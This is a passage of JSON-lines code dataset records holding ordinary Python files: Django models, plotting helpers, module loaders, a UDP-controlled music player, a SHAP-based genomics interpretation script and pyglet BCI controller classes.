payment_mode = models.CharField(max_length=50)\n createdBy = models.ForeignKey(User, on_delete=models.CASCADE)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n \n def publish(self):\n self.date = datetime.now()\n self.save()\n\nclass Commission(models.Model):\n profit_commission = models.FloatField()\n auction_commission = models.FloatField()\n \n def __str__(self):\n s=str(self.profit_commission)\n return s\n \nclass GroupAuction(models.Model):\n id = models.AutoField(primary_key=True)\n date = models.DateTimeField(blank=True, null=True)\n group_id = models.ForeignKey(Group, on_delete=models.CASCADE)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n auction_amount = models.IntegerField(default=0)\n payable = models.IntegerField(default=0)\n month = models.IntegerField(default=0)\n remarks = models.CharField(max_length=300,blank=True, null=True)\n createdBy = models.ForeignKey(User, on_delete=models.CASCADE)\n published_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n status = models.IntegerField(default=0)\n\n def publish(self):\n self.date = datetime.now()\n self.save()\n\nclass PayableAuction(models.Model):\n id = models.AutoField(primary_key=True)\n auction_id = models.ForeignKey(GroupAuction, on_delete=models.CASCADE)\n group_id = models.ForeignKey(Group, on_delete=models.CASCADE)\n member_id = models.ForeignKey(Members, on_delete=models.CASCADE)\n total_payable = models.IntegerField(default=0)\n paid_amount = models.IntegerField(default=0)\n payment_status = models.IntegerField(default=0)\n updated_date = models.DateTimeField(blank=True, null=True, default=timezone.now)\n \n def publish(self):\n self.updated_date = datetime.now()\n self.save()","sub_path":"chit/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"434377751","text":"import matplotlib.pyplot as plt \n\n# Function to plot data for a single agent\ndef plotSingle(X, Y, title):\n\tplt.ylabel(f'Episodes')\n\tplt.xlabel('Timesteps')\n\tline, = plt.plot(X, Y)\n\tline.set_label(title)\n\tplt.legend()\n\tplt.title(title)\n\tplt.show()\n\n# Function to compare between different agents\ndef plotComparision(X, Y, role):\n\tplt.ylabel(f'Episodes')\n\tplt.xlabel('Timesteps')\n\tif role == '1':\n\t\tagents = ['Sarsa(0)', 'Q-learning', 'Expected Sarsa']\n\t\ttitle = 'Comparision between different agents'\n\telif role == '2':\n\t\tagents = ['Sarsa(0)', 'With King\\'s move', 'With King\\'s move and stochastic wind']\n\t\ttitle = 'Comparision for different scenarios'\n\tfor i in range(len(Y)):\n\t\tline, = plt.plot(X, Y[i])\n\t\tline.set_label(f'{agents[i]}')\n\tplt.legend()\n\tplt.title(title)\n\tplt.show()\n","sub_path":"Assignment3/submission/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"130543054","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is 
distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"Miscellaneous helpers.\"\"\"\n\nimport builtins\nimport importlib.util\nimport logging\nimport os\nimport sys\nimport types\nfrom pathlib import Path\n\nlogger = logging.getLogger(__name__)\n\n\ndef _get_module(spec):\n \"\"\"Try to execute a module. Return None if the attempt fail.\"\"\"\n try:\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n return module\n except Exception:\n return None\n\n\ndef locate(path):\n \"\"\"Locate an object by name or dotted path, importing as necessary.\"\"\"\n parts = [part for part in path.split(\".\") if part]\n module, n = None, 0\n while n < len(parts):\n file_location = os.path.join(*parts[: n + 1])\n spec_name = \".\".join(parts[: n + 1])\n module_location = os.path.join(file_location, \"__init__.py\")\n spec = importlib.util.spec_from_file_location(spec_name, module_location)\n logger.debug(\"Trying to import {}\".format(module_location))\n nextmodule = _get_module(spec)\n if nextmodule is None:\n module_location = file_location + \".py\"\n spec = importlib.util.spec_from_file_location(spec_name, module_location)\n logger.debug(\"Trying to import {}\".format(module_location))\n nextmodule = _get_module(spec)\n\n if nextmodule:\n module, n = nextmodule, n + 1\n else:\n break\n if module:\n object = module\n else:\n object = builtins\n for part in parts[n:]:\n try:\n object = getattr(object, part)\n except AttributeError:\n return None\n return object\n\n\ndef load_module(dotted_path: str, filepath: os.PathLike):\n \"\"\"\n Load a module.\n\n :param dotted_path: the dotted path of the package/module.\n :param filepath: the file to the package/module.\n :return: None\n :raises ValueError: if the filepath provided is not a module.\n :raises Exception: if the execution of the module raises exception.\n \"\"\"\n spec = importlib.util.spec_from_file_location(dotted_path, filepath)\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module) # type: ignore\n return module\n\n\ndef import_module(dotted_path: str, module_obj) -> None:\n \"\"\"\n Add module to sys.modules.\n\n :param dotted_path: the dotted path to be used in the imports.\n :param module_obj: the module object. It is assumed it has been already executed.\n :return: None\n \"\"\"\n # if path is nested, and the root package is not present, add it to sys.modules\n split = dotted_path.split(\".\")\n if len(split) > 1 and split[0] not in sys.modules:\n root = split[0]\n sys.modules[root] = types.ModuleType(root)\n\n # add the module at the specified path.\n sys.modules[dotted_path] = module_obj\n\n\ndef load_agent_component_package(\n item_type: str, item_name: str, author_name: str, directory: os.PathLike\n):\n \"\"\"\n Load a Python package associated to a component..\n\n :param item_type: the type of the item. 
One of \"protocol\", \"connection\", \"skill\".\n :param item_name: the name of the item to load.\n :param author_name: the name of the author of the item to load.\n :param directory: the component directory.\n :return: the module associated to the Python package of the component.\n \"\"\"\n item_type_plural = item_type + \"s\"\n dotted_path = \"packages.{}.{}.{}\".format(author_name, item_type_plural, item_name)\n filepath = Path(directory) / \"__init__.py\"\n return load_module(dotted_path, filepath)\n\n\ndef add_agent_component_module_to_sys_modules(\n item_type: str, item_name: str, author_name: str, module_obj\n) -> None:\n \"\"\"\n Add an agent component module to sys.modules.\n\n :param item_type: the type of the item. One of \"protocol\", \"connection\", \"skill\"\n :param item_name: the name of the item to load\n :param author_name: the name of the author of the item to load.\n :param module_obj: the module object. It is assumed it has been already executed.\n :return:\n \"\"\"\n item_type_plural = item_type + \"s\"\n dotted_path = \"packages.{}.{}.{}\".format(author_name, item_type_plural, item_name)\n import_module(dotted_path, module_obj)\n","sub_path":"aea/helpers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177099626","text":"#-*-coding:UTF-8-*-\nimport os\nfrom pygame import mixer #从pygame里面导入我们的音乐播放器\nfrom socket import *\n\n\nhost = ''\nport =5679\t#设备接收端口一会填到手机\nbufsize = 1024\naddr = (host,port) \nudpServer = socket(AF_INET,SOCK_DGRAM)\nudpServer.bind(addr)\n\n\n\ndef findmus(): #找当前目录下的音乐,mp3和flac格式,aac不支持\n L=[]\n l=os.listdir()\n for f in l:\n if f.find(\".mp3\")==len(f)-4 or f.find(\".flac\")==len(f)-5:\n L.append(f) \n return(L)\n\ndef play(x): #播放函数,防止无法载入造成奔溃,这里用了try和except\n try:\n mixer.music.load(x)\n mixer.music.play()\n return 0\n except:\n return 1\n\n\ndef send(sdata): #向手机发送消息的函数\n sdata = sdata.encode()\n udpServer.sendto(sdata,addr)\n\ndef Is_Int(s): #判断str是否可以转换为int\n try: \n int(s)\n return True\n except ValueError:\n return False\n\nL=findmus() #创建一个空的列表用来存放所有找到的音乐\nmixer.init() #启动播放器\nnowplaying=0 #用来定位当前正在播放的歌曲\nprint(\"播放器已启动\")\nprint(\"找到以下歌曲:\")\nn=0\nfor i in L: #列一个歌单\n n=n+1\n print(str(n)+\".\"+i)\n\nwhile 1: #熟悉的循环,大家可以自定义对接收到的命令的处理\n data,addr = udpServer.recvfrom(bufsize)\n data=data.decode()\n if data==\"退出\":\n udpServer.close()\n mixer.quit()\n exit(0)\n \n elif data==\"有什么歌\":\n n=0\n for i in L:\n n=n+1\n send(str(n)+\".\"+i)\n \n elif Is_Int(data):\n if play(L[int(data)-1])==0:\n nowplaying=int(data)-1\n send(\"正在播放:\"+L[nowplaying])\n \n elif data==\"播放\":\n try:\n mixer.music.play()\n except:\n play(L[nowplaying])\n send(\"正在播放\"+L[nowplaying])\n\n elif data==\"暂停\":\n mixer.music.pause()\n\n elif data==\"停\":\n mixer.music.stop()\n\n elif data==\"下一首\":\n nowplaying=nowplaying+1\n if nowplaying>len(L):\n nowplaying=0\n play(L[nowplaying])\n send(\"正在播放\"+L[nowplaying])\n\n elif data==\"上一首\":\n nowplaying=nowplaying-1\n if nowplaying<0:\n nowplaying=len(L)\n play(L[nowplaying])\n send(\"正在播放\"+L[nowplaying]) \n else:\n send(\"对不起,现在只支持这些指令:有什么歌,数字点播,播放,暂停,停,下一首,上一首,退出\")\n","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"119654893","text":"from collections import OrderedDict\nfrom seqdataloader.batchproducers import coordbased\nfrom 
seqdataloader.batchproducers.coordbased import coordstovals\nfrom seqdataloader.batchproducers.coordbased import coordbatchproducers\nfrom seqdataloader.batchproducers.coordbased import coordbatchtransformers\nfrom seqdataloader.batchproducers.coordbased.core import Coordinates\nfrom seqdataloader.batchproducers.coordbased.coordstovals.core import CoordsToValsJoiner\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import AbstractCountAndProfileTransformer \nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import LogCountsPlusOne\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import SmoothProfiles\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import BigWigReader \nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import smooth_profiles\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import rolling_window\nfrom seqdataloader.batchproducers.coordbased.coordstovals.bigwig import MultiTrackCountsAndProfile\nfrom keras_genomics.layers.convolutional import RevCompConv1D\nfrom seqdataloader.batchproducers.coordbased.core import Coordinates, KerasBatchGenerator, apply_mask\nimport keras\nimport keras.layers as kl\nfrom keras.models import load_model\nfrom keras.utils import CustomObjectScope\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport optparse\nimport os\n\nparser = optparse.OptionParser()\n\nparser.add_option('--gpus',\n action=\"store\", dest=\"gpus\",\n help=\"which gpus to use\", default=None)\nparser.add_option('--assay',\n action=\"store\", dest=\"assay\",\n help=\"which control to use\", default=None)\nparser.add_option('--task_names',\n action=\"store\", dest=\"task_names\",\n help=\"what are the tasks\", default=None)\nparser.add_option('--out_pred_len',\n action=\"store\", dest=\"out_pred_len\",\n help=\"length of predicted profile\", default=None)\nparser.add_option('--peaks_bed',\n action=\"store\", dest=\"peaks_bed\",\n help=\"where are the peaks\", default=None)\nparser.add_option('--model',\n action=\"store\", dest=\"model\",\n help=\"where is the model\", default=None)\nparser.add_option('--output_dir',\n action=\"store\", dest=\"output_dir\",\n help=\"where to store end result\", default=None)\n\noptions, args = parser.parse_args()\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=options.gpus\n\ndef multinomial_nll(true_counts, logits):\n \"\"\"Compute the multinomial negative log-likelihood\n Args:\n true_counts: observed count values\n logits: predicted logit values\n \"\"\"\n counts_per_example = tf.reduce_sum(true_counts, axis=-1)\n dist = tfp.distributions.Multinomial(total_count=counts_per_example,\n logits=logits)\n return (-tf.reduce_sum(dist.log_prob(true_counts)) / \n tf.to_float(tf.shape(true_counts)[0]))\n\n#from https://github.com/kundajelab/basepair/blob/cda0875571066343cdf90aed031f7c51714d991a/basepair/losses.py#L87\nclass MultichannelMultinomialNLL(object):\n def __init__(self, n):\n self.__name__ = \"MultichannelMultinomialNLL\"\n self.n = n\n\n def __call__(self, true_counts, logits):\n for i in range(self.n):\n loss = multinomial_nll(true_counts[..., i], logits[..., i])\n if i == 0:\n total = loss\n else:\n total += loss\n return total\n\n def get_config(self):\n return {\"n\": self.n}\n\nwith CustomObjectScope({'MultichannelMultinomialNLL': MultichannelMultinomialNLL,'RevCompConv1D': RevCompConv1D}):\n model = load_model(options.model)\n\nseq_len = 546\nout_pred_len = int(options.out_pred_len)\ntask_names = 
options.task_names.split(',')\npos_neg_smooth_log_counts =\\\n coordstovals.bigwig.PosAndNegSmoothWindowCollapsedLogCounts(\n pos_strand_bigwig_path=\"/users/amr1/pho4/data/ctl_\"+options.assay+\"/\"+options.assay+\".pos_strand.bw\",\n neg_strand_bigwig_path=\"/users/amr1/pho4/data/ctl_\"+options.assay+\"/\"+options.assay+\".neg_strand.bw\",\n counts_mode_name=\"control_logcount\",\n profile_mode_name=\"control_profile\",\n center_size_to_use=out_pred_len,\n smoothing_windows=[1,50])\n\ninputs_coordstovals = coordstovals.core.CoordsToValsJoiner(\n coordstovals_list=[\n coordbased.coordstovals.fasta.PyfaidxCoordsToVals(\n genome_fasta_path=\"/users/amr1/pho4/data/genome/sacCer3.genome.fa\",\n mode_name=\"sequence\",\n center_size_to_use=seq_len),\n pos_neg_smooth_log_counts])\n\ntargets_coordstovals = coordstovals.core.CoordsToValsJoiner(\n coordstovals_list=[\n coordstovals.bigwig.PosAndNegSeparateLogCounts(\n counts_mode_name=task+\".logcount\",\n profile_mode_name=task+\".profile\",\n pos_strand_bigwig_path=\"/users/amr1/pho4/data/\"+task+\"_pbexo/basename_prefix.pooled.positive.bigwig\",\n neg_strand_bigwig_path=\"/users/amr1/pho4/data/\"+task+\"_pbexo/basename_prefix.pooled.negative.bigwig\",\n center_size_to_use=out_pred_len) for task in task_names])\n\nkeras_test_batch_generator = coordbased.core.KerasBatchGenerator(\n coordsbatch_producer=coordbatchproducers.SimpleCoordsBatchProducer(\n bed_file=options.peaks_bed,\n batch_size=64,\n shuffle_before_epoch=False, \n seed=1234),\n inputs_coordstovals=inputs_coordstovals,\n targets_coordstovals=targets_coordstovals)\n\nimport numpy as np\n\ndef extend_generator(generator):\n samp_inputs, samp_targets = generator[0]\n concat_inputs = OrderedDict([(key, []) for key in samp_inputs.keys()])\n concat_targets = OrderedDict([(key, []) for key in samp_targets.keys()])\n for batch_idx in range(len(generator)):\n batch_inputs, batch_targets = generator[batch_idx]\n for key in batch_inputs:\n concat_inputs[key].extend(batch_inputs[key])\n for key in batch_targets:\n concat_targets[key].extend(batch_targets[key])\n for key in concat_inputs:\n concat_inputs[key] = np.array(concat_inputs[key])\n for key in concat_targets:\n concat_targets[key] = np.array(concat_targets[key])\n return (concat_inputs, concat_targets)\n\ntest_inputs, test_targets = extend_generator(keras_test_batch_generator)\n\nfor idx in range(len(task_names)):\n print(model.outputs[idx])\n print(model.outputs[idx+len(task_names)])\n print(task_names[idx])\n \nimport shap\nfrom deeplift.dinuc_shuffle import dinuc_shuffle\n\ndef combine_mult_and_diffref(mult, orig_inp, bg_data):\n to_return = []\n for l in [0]:\n projected_hypothetical_contribs = np.zeros_like(bg_data[l]).astype(\"float\")\n assert len(orig_inp[l].shape)==2\n #At each position in the input sequence, we iterate over the one-hot encoding\n # possibilities (eg: for genomic sequence, this is ACGT i.e.\n # 1000, 0100, 0010 and 0001) and compute the hypothetical \n # difference-from-reference in each case. We then multiply the hypothetical\n # differences-from-reference with the multipliers to get the hypothetical contributions.\n #For each of the one-hot encoding possibilities,\n # the hypothetical contributions are then summed across the ACGT axis to estimate\n # the total hypothetical contribution of each position. 
This per-position hypothetical\n # contribution is then assigned (\"projected\") onto whichever base was present in the\n # hypothetical sequence.\n #The reason this is a fast estimate of what the importance scores *would* look\n # like if different bases were present in the underlying sequence is that\n # the multipliers are computed once using the original sequence, and are not\n # computed again for each hypothetical sequence.\n for i in range(orig_inp[l].shape[-1]):\n hypothetical_input = np.zeros_like(orig_inp[l]).astype(\"float\")\n hypothetical_input[:,i] = 1.0\n hypothetical_difference_from_reference = (hypothetical_input[None,:,:]-bg_data[l])\n hypothetical_contribs = hypothetical_difference_from_reference*mult[l]\n projected_hypothetical_contribs[:,:,i] = np.sum(hypothetical_contribs,axis=-1) \n to_return.append(np.mean(projected_hypothetical_contribs,axis=0))\n to_return.append(np.zeros_like(orig_inp[1]))\n return to_return\n\ndef shuffle_several_times(s):\n numshuffles=20\n return [np.array([dinuc_shuffle(s[0]) for i in range(numshuffles)]),\n np.array([s[1] for i in range(numshuffles)])]\n\nprofile_model_counts_explainer = [shap.explainers.deep.TFDeepExplainer(\n ([model.input[0], model.input[1]],\n tf.reduce_sum(model.outputs[idx],axis=-1)),\n shuffle_several_times,\n combine_mult_and_diffref=combine_mult_and_diffref) for idx in range(len(task_names))]\n\nprofile_model_profile_explainer = []\nfor idx in range(len(task_names), 2*len(task_names)):\n #See Google slide deck for explanations\n #We meannorm as per section titled \"Adjustments for Softmax Layers\"\n # in the DeepLIFT paper\n meannormed_logits = (\n model.outputs[idx]-\n tf.reduce_mean(model.outputs[idx],axis=1)[:,None,:])\n #'stop_gradient' will prevent importance from being propagated through\n # this operation; we do this because we just want to treat the post-softmax\n # probabilities as 'weights' on the different logits, without having the\n # network explain how the probabilities themselves were derived\n #Could be worth contrasting explanations derived with and without stop_gradient\n # enabled...\n stopgrad_meannormed_logits = tf.stop_gradient(meannormed_logits)\n softmax_out = tf.nn.softmax(stopgrad_meannormed_logits,axis=1)\n #Weight the logits according to the softmax probabilities, take the sum for each\n # example. 
This mirrors what was done for the bpnet paper.\n weightedsum_meannormed_logits = tf.reduce_sum(softmax_out*meannormed_logits,\n axis=(1,2))\n profile_model_profile_explainer.append(shap.explainers.deep.TFDeepExplainer(\n ([model.input[0], model.input[2]],\n weightedsum_meannormed_logits),\n shuffle_several_times,\n combine_mult_and_diffref=combine_mult_and_diffref))\n\ntest_seqs = []\ntest_preds_logcount = []\ntest_biastrack_logcount = []\ntest_biastrack_profile = []\ntest_preds_profile = []\ntest_labels_logcount = []\ntest_labels_profile = []\n\nfor batch_idx in range(len(keras_test_batch_generator)):\n batch_inputs, batch_labels = keras_test_batch_generator[batch_idx]\n test_seqs.append(batch_inputs['sequence']) \n test_biastrack_logcount.append(batch_inputs['control_logcount'])\n test_biastrack_profile.append(batch_inputs['control_profile']) \n test_preds = model.predict(batch_inputs)\n test_preds_logcount.append(test_preds[:len(task_names)])\n test_preds_profile.append(test_preds[len(task_names):])\n test_labels_logcount.append([batch_labels[task+'.logcount'] for task in task_names])\n test_labels_profile.append([batch_labels[task+'.profile'] for task in task_names])\ntest_seqs = np.concatenate(test_seqs,axis=0)\ntest_biastrack_logcount = np.concatenate(test_biastrack_logcount, axis=0)\ntest_biastrack_profile = np.concatenate(test_biastrack_profile,axis=0)\ntest_preds_logcount = np.concatenate(test_preds_logcount, axis=1)\ntest_preds_profile = np.concatenate(test_preds_profile, axis=1)\ntest_labels_logcount = np.concatenate(test_labels_logcount, axis=1)\ntest_labels_profile = np.concatenate(test_labels_profile, axis=1)\n\ntest_post_counts_hypimps = [profile_model_counts_explainer[idx].shap_values(\n [test_seqs, np.zeros((len(test_seqs), 1))],\n progress_message=10)[0] for idx in range(len(task_names))]\ntest_post_profile_hypimps = [profile_model_profile_explainer[idx].shap_values(\n [test_seqs, np.zeros((len(test_seqs), out_pred_len, 2))],\n progress_message=10) [0] for idx in range(len(task_names))]\ntest_post_counts_hypimps = np.array(test_post_counts_hypimps)\ntest_post_profile_hypimps = np.array(test_post_profile_hypimps)\ntest_post_counts_actualimps = test_post_counts_hypimps*test_seqs\ntest_post_profile_actualimps = test_post_profile_hypimps*test_seqs\n\nnp.save(options.output_dir+'post_counts_hypimps.npy', test_post_counts_hypimps)\nnp.save(options.output_dir+'post_profile_hypimps.npy', test_post_profile_hypimps) \nnp.save(options.output_dir+'post_counts_actualimps.npy', test_post_counts_actualimps) \nnp.save(options.output_dir+'post_profile_actualimps.npy', test_post_profile_actualimps) \nnp.save(options.output_dir+'labels_profile.npy', test_labels_profile) \nnp.save(options.output_dir+'labels_logcount.npy', test_labels_logcount) \nnp.save(options.output_dir+'preds_profile.npy', test_preds_profile) \nnp.save(options.output_dir+'biastrack_profile.npy', test_biastrack_profile) \nnp.save(options.output_dir+'biastrack_logcount.npy', test_biastrack_logcount) \nnp.save(options.output_dir+'preds_logcount.npy', test_preds_logcount) \nnp.save(options.output_dir+'seqs.npy', test_seqs) ","sub_path":"old_experiments/interpretModelExo.py","file_name":"interpretModelExo.py","file_ext":"py","file_size_in_byte":12997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"505874638","text":"# Copyright (c) James Percent, Byron Galbraith and Unlock contributors.\n# All rights reserved.\n# Redistribution and use in source and binary forms, with 
or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of Unlock nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nfrom unlock.bci import PygletKeyboardCommand\nimport logging\nimport pyglet\nimport inspect\nimport time\nimport os\n\n\nclass UnlockController(object):\n def __init__(self, window, views, batches, command_receiver, poll_signal_frequency,\n standalone=False):\n super(UnlockController, self).__init__()\n self.window = window\n self.views = views\n self.batches = set([])\n if batches:\n self.batches = self.batches.union(batches)\n \n self.command_receiver = command_receiver\n self.standalone = standalone\n self.poll_signal_frequency = poll_signal_frequency\n \n def poll_signal(self, delta):\n command = self.command_receiver.next_command(delta)\n\n if command.stop:\n self.window.handle_stop_request()\n else:\n self.update_state(command)\n self.render()\n\n #if command.stop:\n # self.window.handle_stop_request()\n\n def update_state(self, command):\n ''' Subclass hook '''\n pass\n \n def keyboard_input(self, command):\n self.update_state(command)\n self.render()\n \n def activate(self):\n self.window.activate_controller(self)\n \n def deactivate(self):\n self.window.deactivate_controller()\n return self.standalone\n \n def render(self):\n self.window.render()\n \n \nclass UnlockControllerChain(UnlockController):\n def __init__(self, window, command_receiver, controllers, name, icon,\n poll_signal_frequency=1.0/512.0, standalone=False):\n \n assert controllers and len(controllers) > 0\n \n views = []\n batches = set([])\n for controller in controllers:\n if controller.views:\n views.extend(controller.views) \n \n if controller.batches:\n batches = batches.union(controller.batches)\n \n super(UnlockControllerChain, self).__init__(window, views, batches,\n command_receiver, poll_signal_frequency, standalone=standalone)\n self.controllers = controllers\n self.name = name\n self.icon = icon\n self.standalone = standalone\n\n self.icon_path = os.path.join(os.path.dirname(inspect.getabsfile(UnlockControllerChain)),\n 'resource', self.icon)\n\n def update_state(self, command):\n for controller in self.controllers:\n controller.update_state(command)\n \n def keyboard_input(self, command):\n for 
controller in self.controllers:\n controller.keyboard_input(command)\n self.render()\n \n def activate(self):\n for controller in self.controllers:\n controller.activate()\n super(UnlockControllerChain, self).activate()\n \n def deactivate(self):\n for controller in self.controllers:\n controller.deactivate()\n \n self.window.deactivate_controller() \n return self.standalone\n \n def render(self):\n super(UnlockControllerChain, self).render()\n \n \nclass UnlockControllerFragment(UnlockController):\n \"\"\"\n A controller fragment is a controller that can be 'mixedin' with other fragments. It is not\n intended to be a stand alone controller. For a stand alone controller use/subclass\n UnlockController or UnlockControllerChain.\n \"\"\"\n def __init__(self, model, views, batch, check_command_validity=False):\n super(UnlockControllerFragment, self).__init__(None, None, None, None, None, None)\n self.model = model\n self.views = views\n self.batches.add(batch)\n self.check_command_validity = check_command_validity\n self.poll_signal = None\n self.render = None\n \n def update_state(self, command):\n if command and self.model:\n if self.check_command_validity and not command.is_valid():\n return\n \n self.model.process_command(command)\n \n def keyboard_input(self, command):\n if self.model:\n self.model.process_command(command)\n \n def activate(self):\n if self.model:\n self.model.start()\n \n def deactivate(self):\n if self.model:\n self.model.stop()\n return self.standalone\n \n \nclass UnlockCommandConnectedFragment(UnlockControllerFragment):\n def __init__(self, command_receiver, timed_stimuli, views, batch):\n assert timed_stimuli\n super(UnlockCommandConnectedFragment, self).__init__(timed_stimuli, views, batch)\n self.command_receiver = command_receiver\n \n def keyboard_input(self,command):\n pass\n \n def activate(self):\n assert self.command_receiver\n super(UnlockCommandConnectedFragment, self).activate()\n self.command_receiver.start()\n \n def deactivate(self):\n assert self.command_receiver\n self.command_receiver.stop()\n super(UnlockCommandConnectedFragment, self).deactivate()\n \n \nclass UnlockCalibratedControllerFragment(UnlockControllerFragment):\n def __init__(self, window, model, views, batch, calibrator=None):\n super(UnlockCalibratedControllerFragment, self).__init__(model, views, batch)\n self.window = window\n self.calibrator = calibrator\n if calibrator:\n self.initialized = False\n else:\n self.initialized = True \n \n def initialize(self):\n self.calibrator.activate()\n self.initialized = True\n \n def poll_signal_interceptor(self, delta):\n if not self.initialized:\n self.initialize()\n return\n self.poll_signal(delta)\n \n \nclass UnlockDashboard(UnlockCalibratedControllerFragment):\n def __init__(self, window, model, views, batch, controllers, calibrator):\n super(UnlockDashboard, self).__init__(window, model, views, batch, calibrator)\n self.controllers = controllers\n self.logger = logging.getLogger(__name__)\n \n \nclass PygletWindow(pyglet.window.Window):\n def __init__(self, signal, fullscreen=False, show_fps=True, vsync=False):\n super(PygletWindow, self).__init__(fullscreen=fullscreen, vsync=vsync)\n self.signal = signal\n self.controller_stack = []\n self.views = []\n self.batches = set([])\n if show_fps:\n self.fps = pyglet.clock.ClockDisplay().draw\n else:\n def empty():\n pass\n self.fps = empty\n self.active_controller = None\n \n @self.event\n def on_key_press(symbol, modifiers):\n command = PygletKeyboardCommand(symbol, modifiers)\n if 
command.stop:\n return self.handle_stop_request()\n if self.active_controller and (command.decision or command.selection):\n self.active_controller.keyboard_input(command)\n \n @self.event\n def on_close():\n pass\n \n def render(self):\n self.clear()\n for view in self.views:\n view.render()\n for batch in self.batches:\n if batch:\n batch.draw()\n self.fps()\n \n def handle_stop_request(self):\n if self.active_controller:\n stop = self.active_controller.deactivate()\n if stop:\n self.signal.stop()\n self.signal.close()\n pyglet.app.exit() \n return pyglet.event.EVENT_HANDLED\n else:\n self.signal.stop()\n self.signal.close()\n pyglet.app.exit()\n \n def activate_controller(self, controller):\n if self.active_controller:\n self.controller_stack.append(self.active_controller)\n pyglet.clock.unschedule(self.active_controller.poll_signal) \n \n self.views = controller.views\n self.batches = controller.batches\n pyglet.clock.schedule(controller.poll_signal)#, controller.poll_signal_frequency)\n self.active_controller = controller\n \n def deactivate_controller(self):\n if self.active_controller:\n self.views = []\n self.batches = set([])\n pyglet.clock.unschedule(self.active_controller.poll_signal)\n self.active_controller = None\n \n if len(self.controller_stack) > 0:\n controller = self.controller_stack[-1]\n controller.activate()\n self.controller_stack = self.controller_stack[:-1]\n \n def start(self):\n pyglet.app.run()\n\nclass Canvas(object):\n def __init__(self, batch, width, height, xoffset=0, yoffset=0):\n self.batch = batch\n self.width = width\n self.height = height\n self.x = xoffset\n self.y = yoffset\n \n def center(self):\n return self.xcenter(), self.ycenter()\n \n def xcenter(self):\n return self.width / 2 + self.x\n \n def ycenter(self):\n return self.height / 2 + self.y\n \n","sub_path":"unlock/controller/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":10842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"573482181","text":"import numpy as np\nimport warnings\n\nfrom amset.utils.analytical_band_from_bzt1 import Analytical_bands, get_energy\nfrom amset.utils.band_structure import kpts_to_first_BZ, get_bindex_bspin, \\\n get_closest_k\nfrom amset.utils.constants import Ry_to_eV, hbar, A_to_m, m_to_cm, e, m_e, \\\n Hartree_to_eV\nfrom amset.utils.detect_peaks import detect_peaks\nfrom amset.utils.general import outer, AmsetError, norm\nfrom multiprocessing import cpu_count\nfrom multiprocessing.pool import Pool\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\nfrom pymatgen.symmetry.bandstructure import HighSymmKpath\n\ntry:\n import BoltzTraP2\n import BoltzTraP2.dft\n from BoltzTraP2 import sphere, fite\nexcept ImportError:\n warnings.warn('BoltzTraP2 not imported; \"boltztrap2\" interpolation not available.')\n\n\ndef get_energy_args(coeff_file, ibands):\n \"\"\"\n Args:\n coeff_file (str): the address to the cube (*.123) file\n ibands ([int]): list of band numbers to be calculated; note that the\n first band index is 1 not 0\n\n Returns 